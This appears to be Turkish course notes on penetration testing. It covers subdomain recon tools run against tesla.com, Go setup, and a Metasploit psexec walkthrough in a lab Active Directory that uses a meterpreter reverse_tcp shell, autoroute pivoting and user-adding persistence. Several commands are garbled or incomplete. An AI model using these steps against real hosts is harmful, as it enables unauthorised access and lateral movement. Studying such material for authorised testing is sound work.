GoWitness

Go diliyle yazılmış iwitness toolunun bir benzeridir. https://github.com/sensepost/gowitness Buradaki adresten indirip kuracağız. Daha sonra bu sublist domainlere tek tek bakıp onlardan screenshot almamızı sağlayacak. Çalıştırıp liste şeklinde veridiğimizde ise bütün subdomainlere tek tek gidip ss alacak. Tek bir domainin ss’ini almak için

gowitness single –url=https://tesla.com

şeklinde çalıştırabiliriz.

Httprobe

Listelediğimiz subdomainlerin hangilerinin çalışıp çalışmadığını kontrol etmemizi sağlayan tool.

go get -u github.com/tomnomnom/httprobe

Bu komutla yüklüyoruz.

cat tesla.com/recon/final.txt | httprobe -s -p https:443

Yazarak daha önceki sublister’lardan edindiğimiz bilgiyle listenin tamamına http ve https istek atabiliriz. https:443 ile default https i 443 yapıyoruz.

cat tesla.com/recon/final.txt | httprobe -s -p https:443  sed ‘s/https\?:\/\///’  | tr -d ‘:443’ bunu çalıştırdığımızda tek seferde subdomainlerin başındaki ve sonundaki fazlalıkları atıp öyle gösterir.Son shell scriptimizi aynı olanları atacak sort -u (unique) komutunu ekleyerek şu hale getirip çalıştırabiliriz :

Amass

Amass aynı zamanda subdomain hunting için kullanılır. Bu adresteki from source yükleme yöntemini kullancağız.

https://github.com/OWASP/Amass

Bunun için de şu komutları çalıştırıyoruz  :

amass enum -d tesla.com komutuyla çalıştırabiliriz. Bunun için bash scripti de şöyle yazabiliriz :

AssetFinder

assetfinder subdomain bulmak için oldukça başarılı bir tooldur. Go yüklü olduğu için terminalden şu komutu çalıştırdığımızda tool otomatik olarak yüklenecek :

go get -u github.com/tomnomnom/assetfinder

assetfinder tesla.com dediğimiz sub domainleri kolayca bulur.

assetfinder –subs-only tesla.com

yazdığımızda da sadece o siteyle ilgili subları bulur.

Buradaki bash scripte ise scripti çalıştırmak için öncelikle argüman alıyoruz. Daha sonra birinci if ile eğer o isimde bir klasör yoksa klasör oluşturuyoruz. Sonra da o klasörün altında recon isimli bir klasör yoksa o klasörü oluşturuyoruz. Daha sonra da assetfinder çalıştırıyoruz ve çıkmızı açıp onun içinden grep komutu ile tesla.com barındıranları ayrı bir dosya olarak kayıt ediyoruz. En son da eski dosyayı rm ile siliyoruz. Daha sonra dosyayı executeble hale getirmek için

chmod +c run.sh

komutunu yazıp sonra da

./run.sh tesla.com

komutunu çalıştırıyoruz.

Go Kurulumu

Bazı araçlarda go ya ihtiyaç duyacağımız için go indirip kuruyoruz. Go indirip tar’dan çıkartıyoruz. Daha sonra bu directory’nin kullanıcı türünü değiştirmek gerekiyor. Bunun için

chown -R root:root /usr/local/go

Komutunu yazıyoruz. Daha sonra path’lerin doğru olup olmadığını kontrol etmemiz gerekiyor. Bunun için gedit ~/.profile  yazıp aşağıdaki gibi düzenliyoruz.

Güncellemek için daha sonra . ~./profile komutunu çalıştırıyoruz. echo $PATH yazınca doğru path görmeliyiz. Daha sonra da tooları kurmaya başlayacağız.

Post Exploitation

File transfer için bunlar haricinde metasploit de vardır. Ftp yoluyla file upload download yapmayı sağlar.

Makineye kullanıcı ekleyip shell sağlayabiliriz. Diğer seçeneklerde ise makineye yeni bir port açarız ve bu portların herhangi bir kontrol mekanizması yoktur bu yüzden çok tehlikelidir. Ama kullanıcı eklersek makine kapansa bile açıldığında shelli kontrol edip tekrar çalıştırabiliriz.

Pivot işlemini yapmak için Windows 10 makinelerimizi kapatıyoruz. Bir makine bir networke bağlı olduğuna o makineyi ele geçirince network yardımıyla diğer makinelere de ulaşabiliriz.

????? ===> Lab kurulumu için lab setup videosunu izle ?????

Makineler hazır olduktan sonra msfconsole yazıp metsploit başlatıyoruz.

Daha sonra use exploit/windows/smb/psexec yazıyoruz daha sonra options yazıp seçeneklerine bakacağız. Rhosts belirliyoruz. smbdomaine marvel/local yazıyoruz. Bu active directory’deki domain adımız. set smbpass password1 ve set smbuser fcastle yazıyoruz böylece makinenin kullanıcı adı şifresini de set etmiş oluyoruz. Bunların hepsi active diretory derslerinde kullandığımız bilgiler. set payload windows/x64/meterpreter/reverse_tcp diyoruz. set lhost eth0 diyoruz ve herşeyi set etmiş oluyoruz. set target 2 diyoruz ve run ediyoruz. Ve shell elde etmiş oluyoruz.

shell yazıp giriş yaptık

route print yazıp routingi görebiliriz.

arp -a yazarak haberleşen makineleri görebiliriz. Daha sonra

run autoroute -s 10.10.10.0/24 yazıp bu shell aldığımız makineden diğer makineye route kurmasını sağlıyoruz. Bu aşamada pivoting başlıyor.

 

Devamı pivoting derslerinde …